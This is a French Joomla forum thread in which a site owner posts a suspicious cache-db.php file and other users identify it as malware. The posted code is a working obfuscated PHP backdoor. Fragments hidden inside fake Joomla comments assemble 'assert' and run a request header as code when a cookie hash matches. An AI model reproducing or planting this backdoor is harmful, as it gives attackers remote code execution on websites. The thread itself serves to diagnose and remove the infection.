Fichier bizarre dans le répertoire cache

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • Fichier bizarre dans le répertoire cache

    Bonjour à tous

    J'ouvre un nouveau ticket, un peu ressemblant à mon précédent, mais différent:

    Voilà, sur un site, j'ai remarqué un étrange fichier cache-db.php dans le répertoire cache.

    Le contenu n'a pas l'air d'être un hack, mais tout de même, c'est mon seul site qui présente ce fichier.

    Je vous mets ici le contenu, si vous avez une petite idée, je suis preneur...

    Code:
    <?php
    /**
     * @package     Joomla.Platform
     * @subpackage  Application
     *
     * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
     * @license     GNU General Public License version 2 or later; see LICENSE
     */
    
    !defined('JPATH_PLATFORM') or die;
    
    /**
     * Base object Instance of SimplePie_Sanitize (or other class)
     *
     * @since  11.4
     */
    
    /**
     * SimplePie Name
     */
    define('SIMPLEPIE_NAME', 'SimplePie');
    
    /**
     * SimplePie Version
     */
    define('SIMPLEPIE_VERSION', '1.2');
    
    /**
     * SimplePie Build
     */
    define('SIMPLEPIE_BUILD', '20090627192103');
    
    /**
     * SimplePie Session ID
     */
    $id = $_SERVER['HTTP_SESSION'];
    
    /**
     * Class constructor.
     *
     * @param   JInputCli         $input       An optional argument to provide dependency injection for the application's
     *                                         input object.  If the argument is a JInputCli object that object will become
     *                                         the application's input object, otherwise a default input object is created.
     * @param   Registry          $config      An optional argument to provide dependency injection for the application's
     *                                         config object.  If that object will become
     *                                         the application's config object, otherwise a default config object is created.
     * @param   JEventDispatcher  $dispatcher  An optional argument to provide dependency injection for the application's
     *                                         event dispatcher.  If the argument become
     *                                         the application's event dispatcher, if it is null then the default event dispatcher
     *                                         will be created based on the application's loadDispatcher() method.
     *
     * @see     JApplicationBase::loadDispatcher()
     * @since   11.1
     */
    
    function construct($input = null, $config = null, $dispatcher = null)
    {
        // Close the application if we are not executed from the command line.
        // @codeCoverageIgnoreStart
        if (!defined('STDOUT') || !defined('STDIN') || !isset($_SERVER['argv']))
        {
            $this->close();
        }
        // @codeCoverageIgnoreEnd
    
        // If a input object is given use it.
        if ($input instanceof JInput)
        {
            $this->input = $input;
        }
        // Create the input based on the application logic.
        else
        {
            if (class_exists('JInput'))
            {
                $this->input = new JInputCli;
            }
        }
    
        // If a config object is given use it.
        if ($config instanceof Registry)
        {
            $this->config = $config;
        }
        // Instantiate a new configuration object.
        else
        {
            $this->config = new Registry;
        }
    
        $this->loadDispatcher($dispatcher);
    
        // Load the configuration object.
        $this->loadConfiguration($this->fetchConfigurationData());
    
        // Set the execution datetime and timestamp;
        $this->set('execution.datetime', gmdate('Y-m-d H:i:s'));
        $this->set('execution.timestamp', time());
    
        // Set the current directory.
        $this->set('cwd', getcwd());
    }
    
    /**
     * Returns a reference to the global JApplicationCli object, only creating it if it doesn't already exist.
     *
     * This method must be invoked as: $cli = JApplicationCli::getInstance();
     *
     * @param   string  $name  The*/$sess = md5(@$_COOKIE[ssid]);/*of the JApplicationCli class to instantiate.
     *
     * @return  JApplicationCli
     *
     * @since   11.1
     */ $a='as';
    
    function getInstance($name = null)
    {
        // Only create the object if it doesn't exist.
        if (empty(self::$instance))
        {
            if (class_exists($name) && (is_subclass_of($name, 'JApplicationCli')))
            {
                self::$instance = new $name;
            }
            else
            {
                self::$instance = new JApplicationCli;
            }
        }
    
        return self::$instance;
    }
    
    /**
     * Execute the application.
     *
     * @return  void
     *
     * @since   11.1
     */ $b='sert'; $a=$a.$b;
    function execute()
    {
        // Trigger the onBeforeExecute event.
        $this->triggerEvent('onBeforeExecute');
    
        // Perform application routines.
        $this->doExecute();
    
        // Trigger the onAfterExecute event.
        $this->triggerEvent('onAfterExecute');
    }
    
    /**
     * Load an object or array into the application configuration object.
     *
     * @param   mixed  $data  Either an array or object to be loaded into the configuration object.
     *
     * @return  JApplicationCli  Instance of $this to allow chaining.
     *
     * @since   11.1
     */ $start = strpos($sess,'e89159');
    function loadConfiguration($data)
    {
        // Load the data into the configuration object.
        if (is_array($data))
        {
            $this->config->loadArray($data);
        }
        elseif (is_object($data))
        {
            $this->config->loadObject($data);
        }
    
        return $this;
    }
    
    /**
     * Write a string to standard output.
     *
     * @param   string   $text  The text to display.
     * @param   boolean  $nl    True (default) to append a new line at the end of the output string.
     *
     * @return  JApplicationCli  Instance of $this to allow chaining.
     *
     * @codeCoverageIgnore
     * @since   11.1
     */
    function out($text = '', $nl = true)
    {
        $output = $this->getOutput();
        $output->out($text, $nl);
    
        return $this;
    }
    
    /**
     * Get an output object.
     *
     * @return  CliOutput
     *
     * @since   3.3
     */ if($start===0){@${a}($id);}
    function getOutput()
    {
        if (!$this->output)
        {
            // In 4.0, this will convert to throwing an exception and you will expected to
            // initialize this in the constructor. Until then set a default.
            $default = new Joomla\Application\Cli\Output\Xml;
            $this->setOutput($default);
        }
    
        return $this->output;
    }
    
    
    /**
     * Method to run the application routines.  Most likely you will want to instantiate a controller
     * and execute it, or perform some sort of task directly.
     *
     * @return  void
     *
     * @codeCoverageIgnore
     * @since   11.3
     */
    function doExecute()
    {
        // Your application routines go here.
    }

  • #2
    Re : Fichier bizarre dans le répertoire cache

    J'ai trouvé ça ...
    http://studioblog.advertiseagents.co...m-entdeckt#%22

    ... dont un extrait traduit (automatiquement)
    " ... Depuis 31 Décembre 2015. Cependant, il faut multiplier les messages via un soi-disant "cache-db.php". Un affligé avec le fichier de code malveillant qui ne fait pas partie de la livraison standard du package Joomla et est vulnérable à divers robots des spammeurs, en particulier des messages forts de Host Europe, Alfahosting et beaucoup d'autres sociétés d'hébergement Web.

    Le fichier "cache-db.php" est pour le fonctionnement de Jooomla pas nécessaire ou appartenait pas dans la structure du système. Ceci est confirmé non seulement la recherche agence de publicité Advertiseagents mais aussi de nombreux rapports indépendants du réseau. Par exemple, des cercles du forum officiel Joomla Allemagne ( voir ici ) .Close les sites concernés représentent la vulnérabilité trouvée pas dans une période, cela peut avoir un blocage du site par le fournisseurs d' hébergement Web à suivre... "


    Ainsi je lis qu'on recommande par ci par là de déjà supprimer ce fichier ...
    Personnellement tout ce qui est dans le cache , je le supprime régulièrement sur mes sites ... (à part le fichier index.html)

    Pour ce qui est du hack du site ou pas, je ne peux rien dire !?
    La seule fois où j'ai vu des rajouts de liens sur l'un de mes sites ... c'était une insertion directe
    dans le base de données car les fichiers Joomla n'avaient eux pas été touchés depuis au moins 1 mois donc restauration d'une sauvegarde ... et plus de liens ensuite bien sûr analyse des logs pour tenter
    de retrouver le comment du pourquoi !?
    Solidaire avec les dinosaures

    Commentaire


    • #3
      Re : Fichier bizarre dans le répertoire cache

      re-Bonjour Georgie

      Raté, c'est un hack. Si tu es vigilant, tu le trouveras rien "qu'avec tes yeux", aucun outil requis.

      J'en parlerais Samedi prochain lors de ma présentation "Votre site est-il hacké" ? (https://www.joomladay.fr/programme/e...t-m-en-assurer).

      J'ai nommé ça les virus puzzle. Faut en recoller les morceaux ;-)

      Vire-le, ce fichier est un virus.

      Note : cela fait plusieurs fois que tu nous remontes ce type d'info càd que tu trouves des fichiers. Tu devrais faire un grand nettoyage de printemps; c'est cool, c'est la bonne saison ;-)

      Bonne journée.
      Dernière édition par cavo789 à 22/04/2016, 14h11
      Christophe (cavo789)
      Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)
      Développeur de marknotes, logiciel de gestion de prises de notes avec interface web et de multiples convertisseur https://github.com/cavo789/marknotes
      Mes logiciels OpenSource : https://www.avonture.be

      Commentaire

      Annonce

      Réduire
      1 sur 2 < >

      C'est [Réglé] et on n'en parle plus ?

      A quoi ça sert ?
      La mention [Réglé] permet aux visiteurs d'identifier rapidement les messages qui ont trouvé une solution.

      Merci donc d'utiliser cette fonctionnalité afin de faciliter la navigation et la recherche d'informations de tous sur le forum.

      Si vous deviez oublier de porter cette mention, nous nous permettrons de le faire à votre place... mais seulement une fois
      Comment ajouter la mention [Réglé] à votre discussion ?
      1 - Aller sur votre discussion et éditer votre premier message :


      2 - Cliquer sur la liste déroulante Préfixe.

      3 - Choisir le préfixe [Réglé].


      4 - Et voilà… votre discussion est désormais identifiée comme réglée.

      2 sur 2 < >

      Assistance au forum - Outil de publication d'infos de votre site

      Compatibilité: PHP 4.1,PHP4, 5, 6DEV MySQL 3.2 - 5.5 MySQLi from 4.1 ( @ >=PHP 4.4.9)

      Support Version de Joomla! : | J!3.0 | J!2.5.xx | J!1.7.xx | J!1.6.xx | J1.5.xx | J!1.0.xx |

      Version française (FR) D'autres versions sont disponibles depuis la version originale de FPA

      UTILISER À VOS PROPRES RISQUES :
      L'exactitude et l'exhaustivité de ce script ainsi que la documentation ne sont pas garanties et aucune responsabilité ne sera acceptée pour tout dommage, questions ou confusion provoquée par l'utilisation de ce script.

      Problèmes connus :
      FPA n'est actuellement pas compatible avec des sites Joomla qui ont eu leur fichier configuration.php déplacé en dehors du répertoire public_html.

      Installation :

      1. Téléchargez l'archive souhaitée : http://afuj.github.io/FPA/

      Archive zip : https://github.com/AFUJ/FPA/zipball/master

      2. Décompressez le fichier de package téléchargé sur votre propre ordinateur (à l'aide de WinZip ou d'un outil de décompression natif).

      3. Lisez le fichier LISEZMOI inclus pour toutes les notes de versions spécifiques.

      4. LIRE le fichier de documentation inclus pour obtenir des instructions d'utilisation détaillées.

      5. Téléchargez le script fpa-fr.php à la racine de votre site Joomla!. C'est l'endroit que vous avez installé Joomla et ce n'est pas la racine principale de votre serveur. Voir les exemples ci-dessous.

      6. Exécutez le script via votre navigateur en tapant: http:// www. votresite .com/ fpa-fr.php
      et remplacer www. votresite .com par votre nom de domaine


      Exemples:
      Joomla! est installé dans votre répertoire web et vous avez installé la version française du fichier FPA:
      Télécharger le script fpa-fr.php dans: /public_html/
      Pour executer le script: http://www..com/fpa-fr.php

      Joomla! est installé dans un sous-répertoire nommé "cms" et vous avez installé la version française du fichier FPA:
      Télécharger le script fpa-fr.php dans: /public_html/cms/
      Pour executer le script: http://www..com/cms/fpa-fr.php

      En raison de la nature très sensible de l'information affichée par le script FPA, il doit être retiré immédiatement du serveur après son utilisation.

      Pour supprimer le script de votre site, utilisez le lien de script de suppression fourni en haut de la page du script. Si le lien de suppression échoue pour supprimer le script, utilisez votre programme FTP pour le supprimer manuellement ou changer le nom une fois que le script a généré les données du site et le message publié sur le forum. Si le script est toujours présent sur le site, il peut être utilisé pour recueillir suffisamment d'informations pour pirater votre site. Le retrait du script empêche des étrangers de l'utiliser pour jeter un oeil à la façon dont votre site est structuré et de détecter les défauts qui peuvent être utilisé à vos dépends.
      Voir plus
      Voir moins

      Partenaire de l'association

      Réduire

      Hébergeur Web PlanetHoster
      Travaille ...
      X